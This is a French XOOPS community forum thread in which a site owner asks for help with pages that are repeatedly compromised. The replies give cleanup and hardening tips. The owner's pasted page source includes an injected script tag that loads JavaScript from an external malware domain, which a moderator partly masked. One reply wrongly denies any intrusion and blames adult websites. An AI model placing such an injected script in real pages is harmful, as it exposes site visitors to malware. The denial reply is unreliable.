Fork me on GitHub






Site Xoops régulièrement Piraté
Régulier
Inscrit: 15/02/2003 15:33
Messages: 197
Bonjour, j'ai un site Xoops qui est régulièrement piraté...

Un pirate injecte un code script dans la source de mes pages...
J'ai nettoyé tous mes fichiers et modifier les autorisations d'écriture pour les fichiers infectés...

J'ai un soucis, je ne parviens pas à trouver un des codes du pirate...
Ce code apparaît sur toutes mes pages, juste aprés la balise </head>

Je suis allé voir dans le fichier theme.html de mon thème mais il n'apparaît pas alors que ce code est bien présent sur toutes mes pages...

Où se trouve ce code?

Voici un extrait d'un des codes sources d'une de mes pages infectées:

<!-- RMVadded module header -->
 
<
meta http-equiv="Content-Script-Type" content="text/javascript" />
<
meta http-equiv="Content-Style-Type" content="text/css" />
<
script type="text/javascript" src="http://www.modeles-lettres.com/include/xoops.js"
</script>
 
<script type="text/javascript"> 
<!--
 
//-->
</script>
</head><script src=http://XXXXXXXXX.ye.ro/askmwwt/luck06.php ></script>
<body>


Editer par Ghia: Lien changee par xxx. Ne publier pas des liens malware ici!!

Posté le : 26/05/2010 10:10
Partager Twitter Partagez cette article sur GG+
Re: Site Xoops régulièrement Piraté
Xoops accro
Inscrit: 20/02/2008 20:27
De Belgium
Messages: 2708
Vérifiez tous les fichiers dans le dossier /themes/
(Suivez les liens avec les inclus et tous les fichiers mentionnées dans theme.html)

Pour le piratage, il faut trouver le voie d'entrée des pirates dans les logs Apache.
Probablement vous avez une serveur avec des réglages PHP ou des modules XOOPS qui sont insecure.

Posté le : 26/05/2010 11:09

Salutations, Gerard.
PS: Excusez mon mauvais français.
De la bonne manière de poser les questions
Partager Twitter Partagez cette article sur GG+
Re: Site Xoops régulièrement Piraté
Régulier
Inscrit: 15/02/2003 15:33
Messages: 197
Bonjour,

J'ai trouvé le script était dans le module News..
Je suis chez ovh en 60GP...
Xoops semble être très vulnérable à ces attaques... Protector que j'ai sur mon site ne suffit pas...

Comment mieux protéger un site avec Xoops?

Encore merci

Posté le : 26/05/2010 14:37
Partager Twitter Partagez cette article sur GG+
Re: Site Xoops régulièrement Piraté
Semi pro
Inscrit: 07/11/2009 10:34
De Lot
Messages: 517
En mettant à jour régulièrement le site ainsi que tous les modules, et en réglant protector au mieux de ses possibilités.
Un site 100% protégé ça n'existeras jamais, les hackeurs chercherons toujours la moindre faille pour passer, à partir de là, suite à une attaque remettre à jours son site et bien nettoyer.

Posté le : 26/05/2010 16:50

Tout vient à  point à qui sait attendre.
http://www.graph-attitude.fr
Partager Twitter Partagez cette article sur GG+
Re: Site Xoops régulièrement Piraté
Régulier
Inscrit: 11/11/2005 11:24
Messages: 104
Il n'y a aucun hack sur ton site web. Il n'y aucun pirate non plus qui injecte un code. Télécharge tous les fichiers de ton site, ouvre dreamweaver ensuite tape Ctrl + F et fais rechercher dans un dossier. Met ton script et après tu l'effaces en le remplaçant par un . ou une , . N'oublie pas qu'il indispensable que tu changes le mot de passe du FTP. Et surtout, et ce qui est le plus important, c'est que tu arrêtes de regarder des films adultes sur ton pc, ce sont ces sites là qui sont responsables de ces scripts ;)

Bien cordialement

Posté le : 27/05/2010 15:20

:xfsuper:
Partager Twitter Partagez cette article sur GG+
Re: Site Xoops régulièrement Piraté
Semi pro
Inscrit: 04/08/2005 14:16
De Quelque part dans les étoiles...
Messages: 1141
A windows quand tu nous tiens...

Posté le : 27/05/2010 19:18

Il n'y a qu'une chose que vous pouvez changer dans l'Univers : c'est Vous-Même !
Partager Twitter Partagez cette article sur GG+
Re: Site Xoops régulièrement Piraté
Semi pro
Inscrit: 07/11/2009 10:34
De Lot
Messages: 517
Citation :

Et surtout, et ce qui est le plus important, c'est que tu arrêtes de regarder des films adultes sur ton pc, ce sont ces sites là qui sont responsables de ces scripts ;)

Bien cordialement


pas mieux.

Posté le : 27/05/2010 19:51

Tout vient à  point à qui sait attendre.
http://www.graph-attitude.fr
Partager Twitter Partagez cette article sur GG+

 Haut   Précédent   Suivant



Vous pouvez voir les sujets.
Vous ne pouvez pas débuter de nouveaux sujets.
Vous ne pouvez pas répondre aux contributions.
Vous ne pouvez pas éditer vos contributions.
Vous ne pouvez pas effacez vos contributions.
Vous ne pouvez pas ajouter de nouveaux sondages.
Vous ne pouvez pas voter en sondage.
Vous ne pouvez pas attacher des fichiers à vos contributions.
Vous ne pouvez pas poster sans approbation.

Propulsé avec XOOPS | Graphisme adapté par Tatane, Grosdunord, Montuy337513

50 Personne(s) en ligne (28 Personne(s) connectée(s) sur Forum) | Utilisateur(s): 0 | Invité(s): 50 | Plus ...